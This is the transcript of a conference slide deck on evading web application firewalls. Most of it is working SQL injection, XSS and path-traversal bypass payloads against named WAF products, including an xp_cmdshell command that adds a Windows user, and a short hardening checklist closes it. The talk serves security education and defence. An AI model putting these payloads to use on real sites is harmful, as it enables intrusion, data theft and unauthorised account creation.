web application firewall: suckseed or succeed
DESCRIPTION
Breach WAF with advanced techniquesTRANSCRIPT
Web Application Firewall (WAF)Suckseed or Succeed !?
Mr.Prathan Phongthiproek Consulting Manager, Red TeamACIS Professional Center
Who am I ?
ACIS Professional Center
Manager of the Red Team
Specializing in Attack & Penetration
Information Security Consulting Manager
Instructor and Speaker
Founder of CWH Underground Hacker
Aka 0x7a657133756c
Let’s RevealIntroduction to Web Application Firewall (WAF)
Breach it !! Filter Evasion
HTTP Parameter Contamination
HTTP Pollution: Split and Join
Conclusion
Introduction to Web Application Firewall (WAF)
Web Application Hacking
7 of 10 sites are vulnerable
70% of Cyber attacks are on web ports
95% of companies are hacked through web ports
Anonymous and Lulzsec
Hacker with Operation
#AntiSec
Web Application Hacking
Top 3 Web App AttacksCross Site Scripting
File Inclusion (Remote/Local)
SQL Injection (Normal/Blind/Time based/Regex...)
Misunderstand for Harden Web Application
What’s WAF ?
Emerged from IDS/IPS focused on HTTP protocol and HTTP related attacks
Usually contain a lot of complex
reg-exp rules to match (Blacklist)
For most WAF vendors they are “Closely guarded secrets”
Open-source WAFs (Mod_security and PHPIDS) have open source rules
Understand Blacklist
Detection and ProtectionSQL Injection
Cross Site Scripting
Local and Remote File Inclusion
Code/Command Injection
Directory Traversal
Buffer Overflow
Cookie Poisoning
Parameter Tampering
Upload File Mis-Handling
Information Disclosure
Etc...
WAFs VendorsArmorize
Barracuda
Cisco ACE
Citrix Netscaler
F5
Imperva SecureSphere
Radware Appwall
Profense
Bee-ware
BinarySec
Mod Security
WebKnight
DenyAll
Fortify
Visonys
Pentasecurity
Other..
WAF implementation
Breach it !! (CMS and WAFs)“เอาอยู ่เอาอยู.่......แตกแล้ว”
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
‘ “ -> \’ \”
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
‘ “ -> \’ \”
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
String to ASCII
id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
Filter Evasion (SQLi)
Comments //,--,/**/,/*,#,%00
id=1+un/**/ion+se/**/lect+1,2,3--
Case Changing (lower case)
/union\sselect/gid=1+UnIoN/**/SeLecT/**/1,2,3--
Replaced keywordsid=1+UnunionIoN+SeselectLecT+1,2,3--
Filter Evasion (SQLi)
Case Study: NukeSentinel (PHP Nuke)Encode to Hex
Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......
Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......
Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
Filter Evasion (SQLi)Buffer Overflow (For C language)
id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--
Filter Evasion (SQLi)
Inline Comments (/*!......*/)A lot of WAFs was bypassed
Bypass IPS and Timeout
MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)
/union\sselect/ig
id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
Filter Evasion (SQLi)
Inline Comments (/*!......*/)
Filter Evasion (SQLi)
Censor
Filter Evasion (SQLi)
Other Bypasses: and -> &&
or -> ||
= -> like
substring() -> substr(), mid(), strcmp()
ascii() -> hex(), bin(), char(), ord()
benchmark() -> sleep()
Whitespace -> (),/**/,%0b
isnull, between
Filter Evasion (SQLi)
Case Study: PHPIDS
Filter Evasion (SQLi)
Case Study: PHPIDS
Filter Evasion (SQLi)
Case Study: PHPIDS
Filter Evasion (SQLi)
Case Study: Mod Security CRS
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \
"phase2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
Filter Evasion (SQLi)
Case Study: Mod Security CRShttp://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*barselect#foo1,2,current_user
0 div 1 union select 1,2,current_user
Filter Evasion
Cross Site Scripting (XSS)Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')
Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
File InclusionForbidden: http://victim.com/download.php?file=../../../etc/passwd
Bypass: http://victim.com/download.php?file=../../../etc/passwd..........
Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
HTTP Parameter Contamination
HTTP Parameter Contamination
Bypass Mod_Security SQLi rule (modsecurity_crs_41)
Bypass URLScan 3.1 DenyQueryStringSequences rules
Bypass AQTRONIX Webknight WAF with “%”
HTTP Parameter Contamination
Case Study: AQTRONIX Webknighthttp://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 and 1=0/(select top 1 table_name from information_schema.tables)
HTTP Pollution: Split and Join
HPP is a quite simple but effective hacking technique
HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string
Focus on ASP/ASP.net
A lot of WAF was bypassed
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join
HTTP Pollution: Split and Join
Basic Attack
Forbidden:http://victim.com/search.aspx?q=select name,password from user
Bypass:http://victim.com/search.aspx?q=select name&q=password from user
q=select nameq=password from user
q=select name,password from user
HTTP Pollution: Split and Join
HPP+Inline Comment (Bypass Commercial WAF)
Forbidden:http://victim.com/search.aspx?q=select name,password from user
Bypass:http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user
q=select/*q=*/nameq=password/*q=*/from/*q=*/user
q=select/*,*/name,password/*,*/from/*,*/userq=select name,password from user
HTTP Pollution: Split and Join
HTTP Pollution: Split and JoinCase study: IBM Web Application Firewall (2011-6-21)
Forbidden:http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” --
Bypass:http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --
id=1’; /*id=1*/ EXEC /*id=1*/ master..xp_cmdshell /*id=1*/ “net user lucifer UrWaFisShiT” /*id=1*/ --
id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ --id=1’; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --
“ประเทศไทยต้องการ ความเปลี่ยนแปลง ถึงเวลาที่ทุกคนในประเทศตื่นตัวได้แล้ว ความโง่เขลาจักต้องหมดสิ้นไป”
How to protect your website ?
Implement Secure Software Development Life Cycle (SSDLC)
Secure Coding: Validate all inputs and outputs
Pentest before Online
Harden it !!
Re-visit Again
Deploy WAF (Optional)
ConclusionWAF is not the long-expected
It’s functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
It’s necessary to adapt WAF filter to the particular web app being protected
WAF doesn’t eliminate a vulnerability, It just partly screens the attack vector
It suckseed or succeed !?
“Security Products not able to 100% protect from damn config/coding of admin. Just need a time and imagination for breach it !!”
Greetz To..
ACIS-Red Team
Kyle
Johannes Dahse
Ahmad Maulana
Luca Carettoni
Stefano di Paola
Ivan Markovic
All WAF products that I breached